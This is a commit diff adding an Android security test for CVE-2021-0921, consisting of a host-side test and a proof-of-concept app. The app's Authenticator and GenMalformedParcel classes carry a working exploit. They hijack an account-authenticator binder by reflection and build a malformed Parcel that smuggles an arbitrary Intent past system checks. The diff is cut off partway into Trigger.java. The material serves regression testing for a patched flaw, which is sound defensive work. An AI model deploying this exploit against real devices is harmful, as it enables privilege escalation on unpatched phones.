STS test for Android Security CVE-2021-0921

Test: sts-tradefed run sts-engbuild-no-spl-lock -m CtsSecurityBulletinHostTestCases -t android.security.cts.CVE_2021_0921
Bug: 199779591
Bug: 195962697
Change-Id: Ie5505d4d8d42bc5269d7ef6de9d185ef19f9bcd3
Merged-In: Ie5505d4d8d42bc5269d7ef6de9d185ef19f9bcd3

14 files changed, 741 insertions, 0 deletions

diff --git a/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0921.java b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0921.java
new file mode 100644
index 00000000000..27900e19fcb
--- /dev/null
+++ b/hostsidetests/securitybulletin/src/android/security/cts/CVE_2021_0921.java
@@ -0,0 +1,68 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import android.platform.test.annotations.AppModeFull;
+import android.util.Log;
+import android.platform.test.annotations.AsbSecurityTest;
+import com.android.tradefed.testtype.DeviceJUnit4ClassRunner;
+import com.android.tradefed.testtype.junit4.BaseHostJUnit4Test;
+import com.android.tradefed.log.LogUtil.CLog;
+import org.junit.After;
+import org.junit.Assert;
+import org.junit.Before;
+import org.junit.Test;
+import org.junit.runner.RunWith;
+import static org.junit.Assert.*;
+
+@RunWith(DeviceJUnit4ClassRunner.class)
+public class CVE_2021_0921 extends BaseHostJUnit4Test {
+    private static final String TEST_PKG = "android.security.cts.CVE_2021_0921";
+    private static final String TEST_CLASS = TEST_PKG + "." + "DeviceTest";
+    private static final String TEST_APP = "CVE-2021-0921.apk";
+
+    @Before
+    public void setUp() throws Exception {
+        uninstallPackage(getDevice(), TEST_PKG);
+    }
+
+    @Test
+    @AsbSecurityTest(cveBugId = 195962697)
+    @AppModeFull
+    public void testRunDeviceTest() throws Exception {
+
+        CLog.i("testRunDeviceTest() start");
+        installPackage();
+
+        //ensure the screen is woken up.
+        //KEYCODE_WAKEUP wakes up the screen
+        //KEYCODE_MENU called twice unlocks the screen (if locked)
+        getDevice().executeShellCommand("input keyevent KEYCODE_WAKEUP");
+        getDevice().executeShellCommand("input keyevent KEYCODE_MENU");
+        getDevice().executeShellCommand("input keyevent KEYCODE_HOME");
+        getDevice().executeShellCommand("input keyevent KEYCODE_MENU");
+
+        //run the test
+        Assert.assertTrue(runDeviceTests(TEST_PKG, TEST_CLASS, "test"));
+        CLog.i("testRunDeviceTest() end");
+    }
+
+    private void installPackage() throws Exception {
+        installPackage(TEST_APP, new String[0]);
+    }
+}
+
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/Android.mk b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/Android.mk
new file mode 100644
index 00000000000..57296eb1390
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/Android.mk
@@ -0,0 +1,36 @@
+# Copyright (C) 2021 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+#      http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+include $(CLEAR_VARS)
+
+LOCAL_PACKAGE_NAME := CVE-2021-0921
+LOCAL_SRC_FILES := $(call all-java-files-under, src)
+LOCAL_MODULE_TAGS := tests
+LOCAL_SDK_VERSION := current
+LOCAL_STATIC_JAVA_LIBRARIES := androidx.test.core
+LOCAL_STATIC_JAVA_LIBRARIES += androidx.test.rules
+LOCAL_STATIC_JAVA_LIBRARIES += ub-uiautomator
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts vts sts
+
+LOCAL_PROGUARD_ENABLED := disabled
+LOCAL_DEX_PREOPT := false
+include $(BUILD_CTS_SUPPORT_PACKAGE)
+
+
+
+
+
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/AndroidManifest.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/AndroidManifest.xml
new file mode 100644
index 00000000000..2e81b866e48
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/AndroidManifest.xml
@@ -0,0 +1,57 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ -->
+
+<manifest xmlns:android="http://schemas.android.com/apk/res/android"
+          xmlns:tools="http://schemas.android.com/tools"
+          package="android.security.cts.CVE_2021_0921"
+          android:targetSandboxVersion="2">
+
+  <application>
+    <uses-library android:name="android.test.runner"/>
+
+    <activity android:name=".AuthenticatorActivity" android:exported="true">
+            <intent-filter>
+                <action android:name="android.intent.action.MAIN" />
+                <category android:name="android.intent.category.LAUNCHER" />
+            </intent-filter>
+    </activity>
+
+    <activity android:name=".TestActivity" android:exported="true">
+        <intent-filter>
+            <action android:name="android.intent.action.RUN"/>
+            <category android:name="android.intent.category.DEFAULT"/>
+        </intent-filter>
+    </activity>
+
+    <service
+            android:name=".AuthenticatorService"
+            android:enabled="true"
+            android:exported="true">
+            <intent-filter>
+                <action android:name="android.accounts.AccountAuthenticator" />
+            </intent-filter>
+
+            <meta-data
+                android:name="android.accounts.AccountAuthenticator"
+                android:resource="@xml/authenticator" />
+    </service>
+  </application>
+
+  <instrumentation android:name="androidx.test.runner.AndroidJUnitRunner"
+    android:targetPackage="android.security.cts.CVE_2021_0921" />
+
+</manifest>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/layout/activity_main.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/layout/activity_main.xml
new file mode 100644
index 00000000000..09d024c301f
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/layout/activity_main.xml
@@ -0,0 +1,26 @@
+<?xml version="1.0" encoding="utf-8"?>
+<!--
+  Copyright 2021 The Android Open Source Project
+
+  Licensed under the Apache License, Version 2.0 (the "License");
+  you may not use this file except in compliance with the License.
+  You may obtain a copy of the License at
+
+       http://www.apache.org/licenses/LICENSE-2.0
+
+  Unless required by applicable law or agreed to in writing, software
+  distributed under the License is distributed on an "AS IS" BASIS,
+  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+  See the License for the specific language governing permissions and
+  limitations under the License.
+  -->
+
+<LinearLayout
+    xmlns:android="http://schemas.android.com/apk/res/android"
+    android:layout_width="match_parent"
+    android:layout_height="match_parent">
+    <TextView
+        android:layout_width="match_parent"
+        android:layout_height="match_parent"
+        android:text="CVE-2021-0921"/>
+</LinearLayout>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/values/colors.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/values/colors.xml
new file mode 100644
index 00000000000..69b22338c65
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/values/colors.xml
@@ -0,0 +1,6 @@
+<?xml version="1.0" encoding="utf-8"?>
+<resources>
+    <color name="colorPrimary">#008577</color>
+    <color name="colorPrimaryDark">#00574B</color>
+    <color name="colorAccent">#D81B60</color>
+</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/values/strings.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/values/strings.xml
new file mode 100644
index 00000000000..1a689a5305b
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/values/strings.xml
@@ -0,0 +1,3 @@
+<resources>
+    <string name="app_name">AnyIntentPoc</string>
+</resources>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/xml/authenticator.xml b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/xml/authenticator.xml
new file mode 100644
index 00000000000..46194d5022f
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/res/xml/authenticator.xml
@@ -0,0 +1,5 @@
+<?xml version="1.0" encoding="utf-8"?>
+<account-authenticator
+    xmlns:android="http://schemas.android.com/apk/res/android"
+    android:accountType="android.security.cts"
+    android:label="@string/app_name"/>
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/Authenticator.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/Authenticator.java
new file mode 100644
index 00000000000..4d4ad986f2b
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/Authenticator.java
@@ -0,0 +1,157 @@
+package android.security.cts.CVE_2021_0921;
+
+import android.accounts.AbstractAccountAuthenticator;
+import android.accounts.Account;
+import android.accounts.AccountAuthenticatorResponse;
+import android.annotation.SuppressLint;
+import android.content.Context;
+import android.content.Intent;
+import android.os.Bundle;
+import android.os.IBinder;
+import android.os.IInterface;
+import android.os.Parcel;
+import android.os.RemoteException;
+import android.util.Log;
+
+import java.io.FileDescriptor;
+import java.lang.reflect.Field;
+
+public class Authenticator extends AbstractAccountAuthenticator {
+    public static Intent mIntent;
+    private int TRANSACTION_onResult;
+    private IBinder mOriginRemote;
+    private static final String TAG = "TAG_2021_0921.Authenticator";
+    private IBinder mProxyRemote = new IBinder() {
+        @Override
+        public String getInterfaceDescriptor() throws RemoteException {
+            return null;
+        }
+
+        @Override
+        public boolean pingBinder() {
+            return false;
+        }
+
+        @Override
+        public boolean isBinderAlive() {
+            return false;
+        }
+
+        @Override
+        public IInterface queryLocalInterface(String descriptor) {
+            return null;
+        }
+
+        @Override
+        public void dump(FileDescriptor fd, String[] args) throws RemoteException {
+        }
+
+        @Override
+        public void dumpAsync(FileDescriptor fd, String[] args) throws RemoteException {
+        }
+
+        @Override
+        public boolean transact(int code, Parcel data, Parcel reply, int flags) throws RemoteException {
+            Log.d(TAG, "transact() start");
+            if (code == TRANSACTION_onResult) {
+                Log.d(TAG, "transact() before parse");
+                data.recycle();
+                data = GenMalformedParcel.parsingPackageImplParcel(mIntent);
+                Log.d(TAG, "transact() end parse");
+            }
+            Log.d(TAG, "transact() continue");
+            mOriginRemote.transact(code, data, reply, flags);
+            Log.d(TAG, "transact() end");
+            return true;
+        }
+
+        @Override
+        public void linkToDeath(DeathRecipient recipient, int flags) throws RemoteException {
+        }
+
+        @Override
+        public boolean unlinkToDeath(DeathRecipient recipient, int flags) {
+            return false;
+        }
+    };
+
+    public Authenticator(Context context) {
+        super(context);
+        Log.d(TAG, "Authenticator() constructor");
+    }
+
+    @Override
+    public String getAuthTokenLabel(String authTokenType) {
+        return null;
+    }
+
+    @Override
+    public Bundle editProperties(AccountAuthenticatorResponse response, String accountType) {
+        return null;
+    }
+
+    @Override
+    public Bundle getAuthToken(AccountAuthenticatorResponse response, Account account,
+                               String authTokenType, Bundle options) {
+        return null;
+    }
+
+    @Override
+    public Bundle addAccount(AccountAuthenticatorResponse response, String accountType,
+                             String authTokenType, String[] requiredFeatures, Bundle options) {
+
+        Log.d(TAG, "addAccount() start");
+        try {
+            Class AccountAuthenticatorResponseClass = Class.forName("android.accounts.AccountAuthenticatorResponse");
+            @SuppressLint("SoonBlockedPrivateApi")
+            Field mAccountAuthenticatorResponseField = AccountAuthenticatorResponseClass.getDeclaredField("mAccountAuthenticatorResponse");
+            mAccountAuthenticatorResponseField.setAccessible(true);
+            Object mAccountAuthenticatorResponse = mAccountAuthenticatorResponseField.get(response);
+
+            Class stubClass = null;
+            for (Class inner : Class.forName("android.accounts.IAccountAuthenticatorResponse").getDeclaredClasses()) {
+                if (inner.getCanonicalName().equals("android.accounts.IAccountAuthenticatorResponse.Stub")) {
+                    stubClass = inner;
+                    break;
+                }
+            }
+
+            Field TRANSACTION_onResultField = stubClass.getDeclaredField("TRANSACTION_onResult");
+            TRANSACTION_onResultField.setAccessible(true);
+            TRANSACTION_onResult = TRANSACTION_onResultField.getInt(null);
+
+            Class proxyClass = null;
+            for (Class inner : stubClass.getDeclaredClasses()) {
+                if (inner.getCanonicalName().equals("android.accounts.IAccountAuthenticatorResponse.Stub.Proxy")) {
+                    proxyClass = inner;
+                    break;
+                }
+            }
+
+            Field mRemoteField = proxyClass.getDeclaredField("mRemote");
+            mRemoteField.setAccessible(true);
+            mOriginRemote = (IBinder) mRemoteField.get(mAccountAuthenticatorResponse);
+            mRemoteField.set(mAccountAuthenticatorResponse, mProxyRemote);
+        } catch (Exception e) {
+            e.printStackTrace();
+        }
+        Log.d(TAG, "addAccount() end");
+
+        return new Bundle();
+    }
+
+    @Override
+    public Bundle confirmCredentials(AccountAuthenticatorResponse response, Account account, Bundle options) {
+        return null;
+    }
+
+    @Override
+    public Bundle updateCredentials(AccountAuthenticatorResponse response, Account account, String authTokenType, Bundle options) {
+        return null;
+    }
+
+    @Override
+    public Bundle hasFeatures(AccountAuthenticatorResponse response, Account account, String[] features) {
+        return null;
+    }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/AuthenticatorActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/AuthenticatorActivity.java
new file mode 100644
index 00000000000..41e30eb5ca0
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/AuthenticatorActivity.java
@@ -0,0 +1,31 @@
+package android.security.cts.CVE_2021_0921;
+
+import android.content.Context;
+import android.app.Activity;
+import android.os.Build;
+import android.os.Bundle;
+import android.util.Log;
+
+public class AuthenticatorActivity extends Activity {
+
+    private static final String TAG = "TAG_2021_0921.AuthenticatorActivity";
+
+    @Override
+    protected void onCreate(Bundle savedInstanceState) {
+        super.onCreate(savedInstanceState);
+        Log.d(TAG, "onCreate() start");
+        setContentView(R.layout.activity_main);
+        new Trigger(AuthenticatorActivity.this).accountSettings();
+        Log.d(TAG, "onCreate() end");
+    }
+
+    @Override
+    protected void onResume() {
+        super.onResume();
+        this.finish();
+    }
+}
+
+
+
+
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/AuthenticatorService.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/AuthenticatorService.java
new file mode 100644
index 00000000000..917056239bb
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/AuthenticatorService.java
@@ -0,0 +1,15 @@
+package android.security.cts.CVE_2021_0921;
+
+import android.app.Service;
+import android.content.Intent;
+import android.os.IBinder;
+
+public class AuthenticatorService extends Service {
+    public AuthenticatorService() {
+    }
+
+    @Override
+    public IBinder onBind(Intent intent) {
+        return new Authenticator(this).getIBinder();
+    }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/DeviceTest.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/DeviceTest.java
new file mode 100644
index 00000000000..51733ef15cf
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/DeviceTest.java
@@ -0,0 +1,63 @@
+/*
+ * Copyright (C) 2021 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *      http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts.CVE_2021_0921;
+
+import org.junit.Test;
+import org.junit.runner.RunWith;
+
+import android.content.Context;
+import android.content.Intent;
+import android.content.pm.PackageManager;
+import android.os.SystemClock;
+import android.util.Log;
+import android.support.test.uiautomator.UiDevice;
+import androidx.test.runner.AndroidJUnit4;
+
+import static androidx.test.core.app.ApplicationProvider.getApplicationContext;
+import static androidx.test.platform.app.InstrumentationRegistry.getInstrumentation;
+import static org.junit.Assert.assertFalse;
+
+@RunWith(AndroidJUnit4.class)
+public class DeviceTest {
+
+  private static final String TAG = "TAG_2021_0921.DeviceTest";
+  private UiDevice mDevice;
+
+  @Test
+  public void test() {
+    Log.d(TAG, "test() start");
+
+    //set mDevice and go to homescreen
+    mDevice = UiDevice.getInstance(getInstrumentation());
+    mDevice.pressHome();
+    Context context = getApplicationContext();
+    String TEST_PACKAGE = "android.security.cts.CVE_2021_0921";
+    PackageManager packageManager = context.getPackageManager();
+
+    //start poc app
+    Intent intent = packageManager.getLaunchIntentForPackage(TEST_PACKAGE);
+    intent.addFlags(Intent.FLAG_ACTIVITY_CLEAR_TASK);
+    intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
+    context.startActivity(intent);
+
+    //wait for poc app to complete (it takes about 6 seconds)
+    SystemClock.sleep(20000);
+
+    Log.d(TAG, "test() end");
+  }
+}
+
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/GenMalformedParcel.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/GenMalformedParcel.java
new file mode 100644
index 00000000000..ff0bb62e928
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/GenMalformedParcel.java
@@ -0,0 +1,210 @@
+package android.security.cts.CVE_2021_0921;
+
+import android.accounts.AccountManager;
+import android.content.Intent;
+import android.os.Binder;
+import android.os.Bundle;
+import android.os.Parcel;
+import android.util.Log;
+
+public class GenMalformedParcel {
+
+    private static final String TAG = "TAG_2021_0921.GenMalformedParcel";
+
+    public static Parcel parsingPackageImplParcel(Intent intent) {
+        Log.d(TAG, "parsingPackageImplParcel() start");
+
+        Parcel data = Parcel.obtain();
+        data.writeInterfaceToken("android.accounts.IAccountAuthenticatorResponse");
+        data.writeInt(1);
+        int bundleLenPos = data.dataPosition();
+        data.writeInt(0);
+        data.writeInt(0x4C444E42);
+        int bundleStartPos = data.dataPosition();
+        data.writeInt(3);
+
+        data.writeString("key1");
+        data.writeInt(4);
+        data.writeString("android.content.pm.parsing.ParsingPackageImpl");
+
+        data.writeInt(0); // supportsSmallScreens
+        data.writeInt(0); // supportsNormalScreens
+        data.writeInt(0); // supportsLargeScreens
+        data.writeInt(0); // supportsExtraLargeScreens
+        data.writeInt(0); // resizeable
+        data.writeInt(0); // anyDensity
+        data.writeInt(0); // versionCode
+        data.writeInt(0); // versionCodeMajor
+        data.writeInt(0); // baseRevisionCode
+        data.writeString("versionName"); // versionName
+        data.writeInt(0); // compileSdkVersion
+        data.writeString("compileSdkVersionCodeName"); // compileSdkVersionCodeName
+        data.writeString("packageName"); // packageName
+        data.writeString("realPackage"); // realPackage
+        data.writeString("baseCodePath"); // baseCodePath
+        data.writeInt(false ? 1 : 0); // requiredForAllUsers
+        data.writeString("restrictedAccountType"); // restrictedAccountType
+        data.writeString("requiredAccountType"); // requiredAccountType
+        data.writeString("overlayTarget"); // overlayTarget
+        data.writeString("overlayTargetName"); // overlayTargetName
+        data.writeString("overlayCategory"); // overlayCategory
+        data.writeInt(0); // overlayPriority
+        data.writeInt(false ? 1 : 0); // overlayIsStatic
+        data.writeInt(0); // overlayables
+        data.writeString("staticSharedLibName"); // staticSharedLibName
+        data.writeLong(0); // staticSharedLibVersion
+        data.writeInt(0); // libraryNames
+        data.writeInt(0); // usesLibraries
+        data.writeInt(0); // usesOptionalLibraries
+        data.writeInt(0); // usesStaticLibraries
+        data.writeInt(0); // usesStaticLibrariesVersions
+        data.writeInt(0); // digestsSize
+        data.writeString("sharedUserId"); // sharedUserId
+        data.writeInt(0); // sharedUserLabel
+        data.writeInt(0); // configPreferences
+        data.writeInt(0); // reqFeatures
+        data.writeInt(0); // featureGroups
+        data.writeInt(0); // restrictUpdateHash
+        data.writeInt(0); // originalPackages
+        data.writeInt(0); // adoptPermissions
+        data.writeInt(0); // requestedPermissions
+        data.writeInt(0); // implicitPermissions
+        data.writeInt(0); // upgradeKeySets
+        data.writeInt(0); // keySetMapping
+        data.writeInt(0); // protectedBroadcasts
+        data.writeInt(0); // activities
+        data.writeInt(0); // receivers
+        data.writeInt(0); // services
+        data.writeInt(0); // providers
+        data.writeInt(0); // attributions
+        data.writeInt(0); // permissions
+        data.writeInt(0); // permissionGroups
+        data.writeInt(0); // instrumentations
+        data.writeInt(0); // preferredActivityFilters
+        data.writeInt(0); // processes
+        data.writeInt(0); // metaData
+        data.writeString("volumeUuid"); // volumeUuid
+        data.writeInt(-1); // signingDetails
+        data.writeString("codePath"); // codePath
+        data.writeInt(false ? 1 : 0); // use32BitAbi
+        data.writeInt(false ? 1 : 0); // visibleToInstantApps
+        data.writeInt(false ? 1 : 0); // forceQueryable
+
+        data.writeInt(1); // queriesIntents
+        data.writeInt(0); // queriesIntents
+
+        data.writeInt(0); // queriesPackages
+        data.writeInt(0); // queriesProviders
+        data.writeString(""); // appComponentFactory
+        data.writeString(""); // backupAgentName
+        data.writeInt(-1); // banner
+        data.writeInt(0); // category
+        data.writeString(""); // classLoaderName
+        data.writeString("className"); // className
+        data.writeInt(-1); // compatibleWidthLimitDp
+        data.writeInt(0); // descriptionRes
+        data.writeInt(false ? 1 : 0); // enabled
+        data.writeInt(false ? 1 : 0); // crossProfile
+        data.writeInt(0); // fullBackupContent
+        data.writeInt(0); // iconRes
+        data.writeInt(0); // installLocation
+
+        data.writeInt(0); // labelRes -> queriesPackages
+        data.writeInt(0); // largestWidthLimitDp -> queriesProviders
+        data.writeInt(-1); // logo -> appComponentFactory
+        data.writeString("manageSpaceActivityName"); // manageSpaceActivityName -> backupAgentName
+        data.writeFloat(0); // maxAspectRatio -> banner
+        data.writeFloat(0); // minAspectRatio -> category
+        data.writeInt(-1); // minSdkVersion -> classLoaderName
+        data.writeInt(-1); // networkSecurityConfigRes -> className
+        data.writeInt(1); // nonLocalizedLabel -> compatibleWidthLimitDp
+        data.writeInt(-1); // nonLocalizedLabel -> descriptionRes
+        data.writeInt(-1); // permission -> enabled
+        data.writeInt(-1); // processName -> crossProfile
+        data.writeInt(0); // requiresSmallestWidthDp -> fullBackupContent
+        data.writeInt(0); // roundIconRes -> iconRes
+        data.writeInt(0); // targetSandboxVersion -> installLocation
+        data.writeInt(0); // targetSdkVersion -> labelRes
+        data.writeInt(-1); // taskAffinity -> largestWidthLimitDp
+        data.writeInt(0); // theme -> logo
+        data.writeInt(-1); // uiOptions -> manageSpaceActivityName
+        data.writeInt(-1);  // zygotePreloadName -> maxAspectRatio
+        data.writeInt(0); // splitClassLoaderNames -> minAspectRatio
+        data.writeInt(0); // splitCodePaths -> minSdkVersion
+        data.writeInt(0); // splitDependencies -> networkSecurityConfigRes
+        data.writeInt(0); // splitFlags -> nonLocalizedLabel
+        data.writeInt(-1); // splitNames -> nonLocalizedLabel
+        data.writeInt(-1); // splitRevisionCodes -> permission
+        data.writeInt(false ? 1 : 0); // externalStorage -> processName
+        data.writeInt(false ? 1 : 0); // baseHardwareAccelerated -> processName
+        data.writeInt(true ? 1 : 0); // allowBackup -> requiresSmallestWidthDp
+        data.writeInt(false ? 1 : 0); // killAfterRestore -> roundIconRes
+        data.writeInt(false ? 1 : 0); // restoreAnyVersion -> targetSandboxVersion
+        data.writeInt(false ? 1 : 0); // fullBackupOnly -> targetSdkVersion
+        data.writeInt(false ? 1 : 0); // persistent -> taskAffinity
+        data.writeInt(false ? 1 : 0); // debuggable -> taskAffinity
+        data.writeInt(false ? 1 : 0); // vmSafeMode -> theme
+        data.writeInt(false ? 1 : 0); // hasCode -> uiOptions
+        data.writeInt(false ? 1 : 0); // allowTaskReparenting -> zygotePreloadName
+        data.writeInt(false ? 1 : 0); // allowClearUserData -> zygotePreloadName
+        data.writeInt(false ? 1 : 0); // largeHeap -> splitClassLoaderNames
+        data.writeInt(false ? 1 : 0); // usesCleartextTraffic -> splitCodePaths
+        data.writeInt(false ? 1 : 0); // supportsRtl -> splitDependencies
+        data.writeInt(false ? 1 : 0); // testOnly -> splitFlags
+        data.writeInt(false ? 1 : 0); // multiArch -> splitNames
+        data.writeInt(false ? 1 : 0); // extractNativeLibs -> splitRevisionCodes
+        data.writeInt(false ? 1 : 0); // game -> externalStorage
+        data.writeInt(false ? 1 : 0); // resizeableActivity -> baseHardwareAccelerated
+        data.writeInt(false ? 1 : 0); // staticSharedLibrary -> allowBackup
+        data.writeInt(false ? 1 : 0); // overlay -> killAfterRestore
+        data.writeInt(false ? 1 : 0); // isolatedSplitLoading -> restoreAnyVersion
+        data.writeInt(false ? 1 : 0); // hasDomainUrls -> fullBackupOnly
+        data.writeInt(false ? 1 : 0); // profileableByShell -> persistent
+        data.writeInt(false ? 1 : 0); // backupInForeground -> debuggable
+        data.writeInt(false ? 1 : 0); // useEmbeddedDex -> vmSafeMode
+        data.writeInt(false ? 1 : 0); // defaultToDeviceProtectedStorage -> hasCode
+        data.writeInt(false ? 1 : 0); // directBootAware -> allowTaskReparenting
+        data.writeInt(false ? 1 : 0); // partiallyDirectBootAware -> allowClearUserData
+        data.writeInt(false ? 1 : 0); // resizeableActivityViaSdkVersion -> largeHeap
+        data.writeInt(false ? 1 : 0); // allowClearUserDataOnFailedRestore -> usesCleartextTraffic
+        data.writeInt(false ? 1 : 0); // allowAudioPlaybackCapture -> supportsRtl
+        data.writeInt(false ? 1 : 0); // requestLegacyExternalStorage -> testOnly
+        data.writeInt(false ? 1 : 0); // usesNonSdkApi -> multiArch
+        data.writeInt(false ? 1 : 0); // hasFragileUserData -> extractNativeLibs
+        data.writeInt(false ? 1 : 0); // cantSaveState -> game
+        data.writeInt(false ? 1 : 0); // allowNativeHeapPointerTagging -> resizeableActivity
+        data.writeInt(0); // autoRevokePermissions -> staticSharedLibrary
+        data.writeInt(false ? 1 : 0); // preserveLegacyExternalStorage -> overlay
+        data.writeInt(0); // mimeGroups -> isolatedSplitLoading
+        data.writeInt(0); // gwpAsanMode -> hasDomainUrls
+        data.writeInt(0); // minExtensionVersions -> profileableByShell
+
+        data.writeString("key2");
+        data.writeInt(-1);
+
+        data.writeString("key3");
+        data.writeInt(13);
+        int byteArrayLenPos = data.dataPosition();
+        data.writeInt(0);
+        int byteArrayStartPos = data.dataPosition();
+        for (int i = 0; i < 7; i++) {
+            data.writeInt(0);
+        }
+        data.writeString(AccountManager.KEY_INTENT);
+        data.writeInt(4);
+        data.writeString("android.content.Intent");
+        intent.writeToParcel(data, 0);
+        int byteArrayEndPos = data.dataPosition();
+        data.setDataPosition(byteArrayLenPos);
+        int byteArrayLen = byteArrayEndPos - byteArrayStartPos;
+        data.writeInt(byteArrayLen);
+        data.setDataPosition(byteArrayEndPos);
+        int bundleEndPos = data.dataPosition();
+        data.setDataPosition(bundleLenPos);
+        int bundleLen = bundleEndPos - bundleStartPos;
+        data.writeInt(bundleLen);
+        data.setDataPosition(bundleEndPos);
+        Log.d(TAG, "parsingPackageImplParcel() end");
+        return data;
+    }
+}
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/TestActivity.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/TestActivity.java
new file mode 100644
index 00000000000..5fe3acfc869
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/TestActivity.java
@@ -0,0 +1,23 @@
+package android.security.cts.CVE_2021_0921;
+
+import android.content.Context;
+import android.app.Activity;
+
+import android.os.Bundle;
+import android.util.Log;
+import org.junit.Assert;
+
+public class TestActivity extends Activity {
+    private static final String TAG = "TAG_2021_0921.TestActivity";
+
+    @Override
+    protected void onCreate(Bundle savedInstanceState) {
+        super.onCreate(savedInstanceState);
+        Log.d(TAG, "onCreate() start");
+        Assert.fail("Arbitrary intent executed. Device is vulnerable.");
+    }
+}
+
+
+
+
diff --git a/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/Trigger.java b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/Trigger.java
new file mode 100644
index 00000000000..987b161766f
--- /dev/null
+++ b/hostsidetests/securitybulletin/test-apps/CVE-2021-0921/src/android/security/cts/CVE_2021_0921/Trigger.java
@@ -0,0 +1,41 @@
+package android.security.cts.CVE_2021_0921;
+
+import android.content.ComponentName;
+import android.content.Context;
+import android.content.Intent;
+import android.content.pm.ApplicationInfo;
+import android.net.Uri;
+import android.util.Log;
+
+import java.io.File;
+
